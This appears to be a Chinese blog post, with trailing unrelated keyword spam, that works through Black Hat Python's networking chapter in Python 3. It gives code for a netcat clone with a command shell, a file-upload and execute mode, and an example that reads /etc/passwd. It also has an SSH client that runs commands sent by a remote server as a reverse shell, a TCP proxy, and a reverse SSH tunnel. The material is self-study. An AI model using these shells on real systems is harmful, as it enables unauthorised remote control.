python3黑帽子mbp版(第2章:网络基础)
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,写在最前面的话:很早之前就想学python了,趁着买来了书,打算开始python学习之旅。先说下我的工具:使用的是sublime text3编辑器,主要使用的网站是廖雪峰老师的网站,借鉴了很多ODbo
千家信息网最后更新 2025年12月01日python3黑帽子mbp版(第2章:网络基础)
写在最前面的话:很早之前就想学python了,趁着买来了书,打算开始python学习之旅。先说下我的工具:使用的是sublime text3编辑器,主要使用的网站是廖雪峰老师
的网站,借鉴了很多ODboy博客中的知识点。
tcp客户端
#!/usr/bin/env python3# -*- code: utf-8 -*-import sockettarget_host="www.baidu.com"target_port=80client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#AF_INET表示IPv4, socket.SOCK_STREAM 表示TCP协议client.connect((target_host,target_port))#参数是一个元祖,包含地址和端口号。client.send(b"GET / HTTP/1.1\r\nHost: baidu.com\r\n\r\n")response=client.recv(4096)print (response)client.close

UDP客户端
#!/usr/bin/env python3# -*- code: utf-8 -*-target_host="127.0.0.1"target_port=12345client=socket(AF_INET,SOCK_DGRAM)client.sendto("BBC".encode("utf-8"),(target_host,target_port))print(client.recvfrom(4096).decode("utf-8"))client.close()
这两个是客户端是比较简单的,只有简单的连接功能,由于没有找到合适的UDP客户端,这里直接监听本机端口来连接。
TCP服务端
#!/usr/bin/env python3#coding=utf8from socket import *from time import ctimeimport os import threadingbufsize = 1024addr = ('0.0.0.0',13140)# 定义socket类型,网络通信server=socket(AF_INET,SOCK_STREAM)server.bind(addr)server.listen(5)print("listening on",addr)def handle_client(client_socket): request=client_socket.recv(1024) print("received:%s" %request) client_socket.send(bytes("ACK!".encode("utf-8"))) client_socket.close()while True:# client是客户端的socket对象,add是地址加端口,此client等于函数中的client_socket client,add1=server.accept() print("accpet connection from:%s:%d" %(add1[0],add1[1]))# 用于线程化的args参数。线程应该是一个元组,所以应该是client, client_handle=threading.Thread(target=handle_client,args=(client,)) client_handle.start()这是连接服务端的代码,跟tcp和udp客户端有些小区别。
#coding=utf8from socket import *host="127.0.0.1"port=13140data=input("输入要发送的信息:")client=socket(AF_INET,SOCK_STREAM)print("正在连接...")client.connect((host,port))client.send(data.encode("utf-8"))print ("Connected from ",client.getsockname()) print ("Connected to ",client.getpeername())print(client.recv(4096).decode("utf-8"))本地服务端:
本地客户端:
取代netcat
#!/usr/bin/env python3#coding=utf-8import sysfrom socket import *import getopt #用来处理命令行参数import threadingimport subprocess #启动一个shell,并控制输入输出#-e和-p有问题,mac下运行没什么问题,win下有问题,运行的命令会出现问题。listen = Falsecommand = Falseupload = Falseexecute = ""target = ""upload_destination = ""port = 0def usage(): print("netcat") print("Usage:nc_hacker.py -t target_host -p target_port") print("-l --listen - listen on [host]:[port] for incoming connections") print("-e --execute=ile_to_run - execute the given file upon receiving a connection") print("-c --command - initialize a command shell") print("-u --upload=destination - upon receiving connection upload a file and write to [destination]") print("Examples: ") print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -c") print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -u c:\\target.exe") print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -e \"cat /etc/passwd\"") print("echo 'ABCDEFGHI' | ./nc_hacker.py -t 192.168.11.12 -p 135") sys.exit(0)#主函数def main(): global listen global port global execute global command global upload_destination global target #没有输入值就显示菜单 if not len(sys.argv[1:]): usage() try: #getopt模块处理命令行, #h后面没有冒号:表示后面不带参数,p:和i:后面有冒号表示后面需要参数 #help后面没有等号=,表示后面不带参数,有=,表示后面需要参数 #返回值options是个包含元祖的列表,每个元祖是分析出来的格式信息,比如[('-i','127.0.0.1'),('-p','80')] #args 是个列表,包含那些没有'-'或'--'的参数,比如:['55','66'] opts,args=getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) except getopt.GetoptError as err: print(str(err)) usage() for o,a in opts: if o in("-h","--help"): usage() elif o in("-l","--listen"): listen=True elif o in("-e","--execute"): execute=a elif o in("-c","--command"): command=True elif o in("-u","--upload"): upload_destination=a elif o in("-t","--target"): target=a elif o in("-p","--port"): port=int(a) else: print("unhandled option") # 从标准输入中发送数据 if not listen and len(target) and port > 0: # 读取输入的数据 # 这里将阻塞,发送ctrl-d使用 buffer=input()#sys.stdin.read() # 发送数据 client_sender(buffer) # 进行监听 if listen: print('the server is listening on %s:%d' %(target,port)) server_loop()# 客户端代码def client_sender(buffer): client = socket(AF_INET, SOCK_STREAM) try: print("start connecting...") client.connect((target,port)) print("connected") #如果我们检测到来自stdin的输入。 #如果不是,我们就等待用户输入。 if len(buffer): client.send(buffer) while True: # 等待数据回传 recv_len = 1 response = "" print("waiting response:") while recv_len: data = client.recv(4096) recv_len = len(data) response+= data.decode("utf-8") if recv_len < 4096: break print(response,end="") # 等待更多输入 buffer = input("") buffer += "\n" client.send(buffer.encode("utf-8")) except: print("[*] Exception! Exiting.") # 断开连接 client.close()# 服务端代码def server_loop(): global target,port # 如果没有定义目标,就监听所有接口 if not len(target): target = "0.0.0.0" server = socket(AF_INET,SOCK_STREAM) server.bind((target,port)) server.listen(5) while True: client_socket, addr = server.accept() # print(client_socket) # 分出一个线程来处理新的客户端 client_thread = threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start()# -c命令def run_command(command): # 返回从字符串末尾删除所有字符串的字符串(默认空白字符)的副本 command = command.rstrip() # 运行命令并将输出返回 try: #subprocess.STDOUT是抛出异常。 output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True) except: output = "Failed to execute command.\r\n" # 将输出发送 return output# 处理传入的客户端连接def client_handler(client_socket): global upload,execute,command # 检测上传文件 if len(upload_destination): # 读取所有的字节并写入 file_buffer = "" # 持续读取数据直到没有数据可用为止,有问题 while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data # 现在我们取这些字节并试着把它们写出来。 try: print('opening') file_descriptor = open(upload_destination,"wb") file_descriptor.write(file_buffer) print('written') file_descriptor.close() # 确认文件是否上传 client_socket.send("Successfully saved file to %s\r\n" % upload_destination) except: client_socket.send("Failed to save file to %s\r\n" % upload_destination) # 检查命令执行 if len(execute): # 运行命令 output = run_command(execute) client_socket.send(output) # 如果需要一个命令shell,那我们进入另一个循环,。 if command: while True: # 跳出一个窗口 client_socket.send(b" ") #现在我们接收文件直到发现换行符(enter key) cmd_buffer = "" while "\n" not in cmd_buffer: cmd_buffer += client_socket.recv(1024).decode("utf-8") # 返还命令输出 response = run_command(cmd_buffer) # 返回相应数据 client_socket.send(response)if __name__=="__main__": main() 本地服务端:
本地客户端:
切换到python3后,netcat中有很多功能不完善,后期有时间要优化一下。
创建一个TCP代理
#!/usr/bin/env python3#coding=utf-8import sysfrom socket import *import threading# 16进制导出函数def hexdump(src, length=16): result = [] # 判读输入是否为字符串 digits = 4 if isinstance(src, str) else 2 for i in range(0, len(src), length): # 将字符串切片为16个为一组 s = src[i:i+length] # 用16进制来输出,x是digits的值,表示输出宽度 hexa = ' '.join(["%0*X" % (digits, (x)) for x in s]) # 用来输出原值 text = ''.join([chr(x) if 0x20 <= x < 0x7F else '.' for x in s]) #%-*s, 星号是length*(digits + 1)的值 result.append( "X %-*s %s" % (i, length*(digits + 1), hexa, text) ) print('\n'.join(result))# 设置延时有问题,后续更改def receive_from(connection): buffer = b"" # 设置5s延迟,connection=socket(AF_INET, SOCK_STREAM) connection.settimeout(5) try: # 保持数据的读取直到没有数据或超时 while True: data = connection.recv(4096) if not data: break buffer += data except: pass return buffer# 对目标主机的请求数据进行修改def request_handler(buffer): return buffer# 对返回本地主机的响应数据进行修改def response_handler(buffer): return bufferdef proxy_handler(client_socket, target_host, target_port, receive_first): # 连接目标主机 target_socket = socket(AF_INET, SOCK_STREAM) target_socket.connect((target_host,target_port)) # 必要时从目标主机接收数据 if receive_first: target_buffer = receive_from(target_socket) hexdump(target_buffer) # 发送给我们的响应处理程序 target_buffer = response_handler(target_buffer) # 如果要发送数据给本地客户端,发送它 if len(target_buffer): print("[<==] Sending %d bytes to localhost." % len(target_buffer)) client_socket.send(target_buffer) # 现在我们从本地循环读取数据,发送给远程主机和本地主机 while True: # 从本地读取数据 local_buffer = receive_from(client_socket) if len(local_buffer): print("[==>] Received %d bytes from localhost." % len(local_buffer)) hexdump(local_buffer) # 发送给我们的本地请求 local_buffer = request_handler(local_buffer) # 发送数据给目标主机 target_socket.send(local_buffer) print("[==>] Sent to target.") # 接收响应的数据 target_buffer = receive_from(target_socket) if len(target_buffer): print("[<==] Received %d bytes from target." % len(target_buffer)) hexdump(target_buffer) # 发送到响应处理函数 target_buffer = response_handler(target_buffer) # 将响应发送给本地socket client_socket.send(target_buffer) print("[<==] Sent to localhost.") # 两边没有数据了,就关闭连接 if not len(local_buffer) or not len(target_buffer): client_socket.close() target_socket.close() print("[*] No more data. Closing connections.") break def server_loop(local_host,local_port,target_host,target_port,receive_first): server = socket(AF_INET, SOCK_STREAM) try: server.bind((local_host,local_port)) except: print("[!!] Failed to listen on %s:%d" % (local_host,local_port)) print("[!!] Check for other listening sockets or correct permissions.") sys.exit(0) print("[*] Listening on %s:%d" % (local_host,local_port)) server.listen(5) while True: client_socket, addr = server.accept() # 本地连接信息 print("[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])) # 开启线程和目标主机通信 proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,target_host,target_port,receive_first)) proxy_thread.start()def main(): if len(sys.argv[1:]) != 5: print("Usage: ./proxy.py [localhost] [localport] [targethost] [targetport] [receive_first]") print("Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True") sys.exit(0) # 本地参数 local_host = sys.argv[1] local_port = int(sys.argv[2]) # 目标参数 target_host = sys.argv[3] target_port = int(sys.argv[4]) receive_first = sys.argv[5] if "True" in receive_first: receive_first = True else: receive_first = False # 开始监听 server_loop(local_host,local_port,target_host,target_port,receive_first)main()代理服务器:
本地客户端连接:
这个16进制导出函数非常漂亮,花了很多时间在上面学习。
系统中处理数据都是unicode(也就是Python3中的str), 而传输数据用的都是UTF-8(Python3中bytes)
wireshark抓包的时候需要干净的主机(除了需要抓包的应用程序,其他的都不要),而TCP代理可以让你看清楚单个的数据包,可以更好的帮助你了解未知的协议以及其他的信息。
通过Paramiko使用SSH
SSH服务端:
#!/usr/bin/env python3# coding=utf-8from socket import *import paramikoimport threadingimport sys#http://freeloda.blog.51cto.com/2033581/1216176 # 使用命令生成私钥openssl genrsa -out rsa_private_key.pem 1024,经过抓包,发现是加密的#http://www.jb51.net/article/70036.htmhost_key=paramiko.RSAKey(filename='rsa_private_key.pem')class Server(paramiko.ServerInterface): def __init__(self): # 执行start_server()方法首先会触发Event,如果返回成功,is_active返回True self.event=threading.Event() # 当认证成功,client会请求打开一个Channel def check_channel_request(self, kind, chanid): if kind=='session': return paramiko.OPEN_SUCCEEDED return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED # 当is_active返回True,进入到认证阶段 def check_auth_password(self,username,password): if (username=='Star') and (password=='123'): return paramiko.AUTH_SUCCESSFUL return paramiko.AUTH_FAILED server=sys.argv[1]ssh_port=int(sys.argv[2])# 建立服务端sockettry: sock = socket(AF_INET, SOCK_STREAM) # SOL_SOCKET 意思是正在使用的socket选项。 # SO_REUSEADDR 当socket关闭后,本地端用于该socket的端口号立刻就可以被重用 # 1 表示将SO_REUSEADDR标记为TRUE,操作系统会在服务器socket被关闭或服务器进程终止后马上释放该服务器的端口,否则操作系统会保留几分钟该端口。 sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) sock.bind((server, ssh_port)) sock.listen(100) print('[+] Listening for connection ...') client, addr = sock.accept()except Exception as e: print ('[-] Listen failed: ' + str(e)) sys.exit(1)print ('[+] Got a connection!')try: # 用sock.accept()返回的socket实例化Transport bhSession = paramiko.Transport(client) # 添加一个RSA密钥加密会话 bhSession.add_server_key(host_key) server = Server() try: # 启动SSH服务端 bhSession.start_server(server=server) except paramiko.SSHException as x: print ('[-] SSH negotiation failed.') chan = bhSession.accept(20) # 等待客户端开启通道,超时时间为20s # accept(timeout=None) # Return the next channel opened by the client over this transport, in server mode. If no channel is opened before the given timeout, None is returned. # Parameters: timeout (int) - seconds to wait for a channel, or None to wait forever # Returns: a new Channel opened by the client # http://docs.paramiko.org/en/1.15/api/transport.html print ('[+] Authenticated!') print (chan.recv(1024)) chan.send(b'Welcome to ssh') while True: try: command= input("Enter command: ").strip('\n') if command != 'exit': # 输入值编码 chan.send(command.encode("utf-8")) # 接收值编码 print(chan.recv(1024).decode("utf-8") + '\n') else: chan.send(b'exit') print ('exiting') bhSession.close() #正常情况没有输出,这里让它报出异常 raise Exception ('exit') except KeyboardInterrupt: bhSession.close()except Exception as e: print ('[-] Caught exception: ' + str(e)) try: bhSession.close() except: pass sys.exit(1)ssh客户端:
#!/usr/bin/env python3#coding=utf-8import threadingimport paramikoimport subprocessdef ssh_command(ip,user,passwd,command): # 建立一个sshclient对象 client = paramiko.SSHClient() # client.load_host_keys("路径") # 允许将信任的主机自动加入到host_allow列表,此方法必须放在connect方法的前面 client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 client.connect(ip, username=user, password=passwd) ssh_session = client.get_transport().open_session() if ssh_session.active: ssh_session.send(command.encode("utf-8")) # 输出banner信息 print(ssh_session.recv(1024).decode("utf-8")) while True: # 从服务端获得命令 command =ssh_session.recv(1024).decode("utf-8") try: cmd_output = subprocess.check_output(command,shell =True) ssh_session.send(cmd_output) except Exception as e: ssh_session.send(str(e).encode("utf-8")) client.close() return #如何让command输出字符串ssh_command("192.168.3.110","Star","123","ClientConnected")在本地我生成了一个私钥,没有生成公钥,然后就可以秘钥连接了:
openssl genrsa -out rsa_private_key.pem 2048
ssh客户端:
ssh服务端:
我把服务端放在了我的Win10上,可以看到获取到了mac上的shell。这里是反向链接,是放在目标主机上的是客户端。
ssh隧道
#!/usr/bin/env python3#coding=utf-8import paramikoimport sysimport socketfrom optparse import OptionParserimport threadingimport getpassimport osimport selectSSH_PORT = 22DEFAULT_PORT = 4000g_verbose = TrueHELP = """\Set up a reverse forwarding tunnel across an SSH server, using paramiko. Aport on the SSH server (given with -p) is forwarded across an SSH sessionback to the local machine, and out to a remote site reachable from thisnetwork. This is similar to the openssh -R option."""def get_host_port(spec, default_port): # 解析'主机名:22'到主机和端口,端口可选。 args = (spec.split(':', 1) + [default_port])[:2] args[1] = int(args[1]) return args[0], args[1]# https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.htmldef main(): # 传入参数,server指ssh服务器,remote指要连接的服务器 # options,它是一个对象,保存有命令行参数值。知道命令行参数名,就可以访问其对应的值:options.file options,server,remote = parse_options() password = None if options.readpass: password = getpass.getpass("Enter SSH password:") # 建立一个sshclient对象 client = paramiko.SSHClient() # 加载本地的known_hosts文件,纪录连到对方时,对方给的host key。每次连线时都会检查 # 目前对方给的host key与纪录的host key是否相同,可以简单验证连结是否又被诈骗等相关事宜。 client.load_system_host_keys() # 用ssh连接远程主机时,第一次连接时会提示是否继续进行远程连接,选择yes # 这里主动帮你选上yes client.set_missing_host_key_policy(paramiko.WarningPolicy()) verbose("Connecting to ssh host %s:%d ..." %(server[0], server[1])) try: client.connect(server[0],server[1],username = options.user,key_filename =\ options.keyfile,look_for_keys = options.look_for_keys,password = password) except Exception as e: print("*** Failed to connect to %s:%d:%r" %(server[0],server[1],e)) sys.exit(1) verbose("Now forwarding remote port %d to %s:%d ..." %((options.port),\ remote[0],remote[1])) try: #get_transport返回用于此目的的底层传输SSH连接。这可以被用于执行低级别的任务,如打开特定的通道。 #client.get_transport=实例化transport reverse_forward_tunnel(options.port,remote[0],remote[1],client.get_transport()) except KeyboardInterrupt: print("C-c: Port forwarding stopped.") sys.exit(0)def verbose(s): if g_verbose: print(s)def reverse_forward_tunnel(server_port, remote_host, remote_port, transport): # request_port_forward ==> 把端口数据的发送和接收通过新的传输通道转发出去 transport.request_port_forward("", server_port) while True: chan = transport.accept(1000) if chan is None: continue thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port)) thr.setDaemon(True) thr.start()def handler(chan, host, port): sock = socket.socket() try: sock.connect((host, port)) except Exception as e: verbose("Forwarding request to %s:%d failed: %r" % (host, port, e)) return verbose("Connected! Tunnel open %r -> %r -> %r" % (chan.origin_addr,\ chan.getpeername(), (host, port))) while True: # http://www.cnblogs.com/alex3714/p/4372426.html # select通过单进程实现同时处理多个非阻塞的socket连接。 # 可以为系统底层中接收就绪一个消息后就会标注一个记号,我们读取到记号后采取相应的动作。 # 这里实现了channel与sock的数据交换。 r, w, x = select.select([sock, chan], [], []) if sock in r: data = sock.recv(1024) if len(data) == 0: break chan.send(data) if chan in r: data = chan.recv(1024) if len(data) == 0: break sock.send(data) # 停止发送和接收数据 chan.close() sock.close() verbose("Tunnel closed from %r" % (chan.origin_addr,))def parse_options(): global g_verbose # http://blog.csdn.net/cclarence/article/details/50964316 # 解析命令行参数,dest的值是options点后面加的值 parser = OptionParser(usage='usage: %prog [options] [:]', version='%prog 1.0', description=HELP) parser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True, help='squelch all informational output') parser.add_option('-p', '--remote-port', action='store', type='int', dest='port', default=DEFAULT_PORT, help='port on server to forward (default: %d)' % DEFAULT_PORT) parser.add_option('-u', '--user', action='store', type='string', dest='user', default=getpass.getuser(), help='username for SSH authentication (default: %s)' % getpass.getuser()) parser.add_option('-K', '--key', action='store', type='string', dest='keyfile', default=None, help='private key file to use for SSH authentication') parser.add_option('', '--no-key', action='store_false', dest='look_for_keys', default=True, help='don\'t look for or use a private key file') parser.add_option('-P', '--password', action='store_true', dest='readpass', default=False, help='read password (for key or password auth) from stdin') parser.add_option('-r', '--remote', action='store', type='string', dest='remote', default=None, metavar='host:port', help='remote host and port to forward to') options, args = parser.parse_args() if len(args) != 1: parser.error('Incorrect number of arguments.') if options.remote is None: parser.error('Remote address required (-r).') g_verbose = options.verbose server_host, server_port = get_host_port(args[0], SSH_PORT) remote_host, remote_port = get_host_port(options.remote, SSH_PORT) return options, (server_host, server_port), (remote_host, remote_port)if __name__ == '__main__': main() 路由器的登录页面
这里是用mac连接kali的机子,然后在kali上查看路由器的登录页面。
数据
服务
客户
客户端
utf-8
参数
命令
主机
输入
输出
目标
处理
字符
服务器
端口
字符串
问题
函数
信息
对象
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
软件开发可以进入哪些公司
数据库工程师外包
数据库技术计算机三级主要用
服务器200m多少钱
网上比较热门的网络技术
秦皇岛服务器虚拟化 技术支持
网络安全信息系统生命周期
数据库有哪些高级证书
临沧新华互联网科技找哪家
义乌白帽子网络安全
信号网络安全检查做什么
武林外传有多少网通服务器
销售网络技术合作
家用cpu和服务器cpu指令集
大华服务器架构
数据库上机实验实验8报告
广东省计算机网络安全部门
台达电子软件开发
高档服务器玩游戏
服务器管理系统怎么改
湖北工控软件开发报价
海淀区口碑好的网络技术服务介绍
网络安全竞赛编码题
软件开发部门名字大全
网络安全与知识产权保护
pg数据库最新操作手册
计算机网络技术孙波版
临沂安捷通网络技术
wow那个服务器人多
七日杀开服务器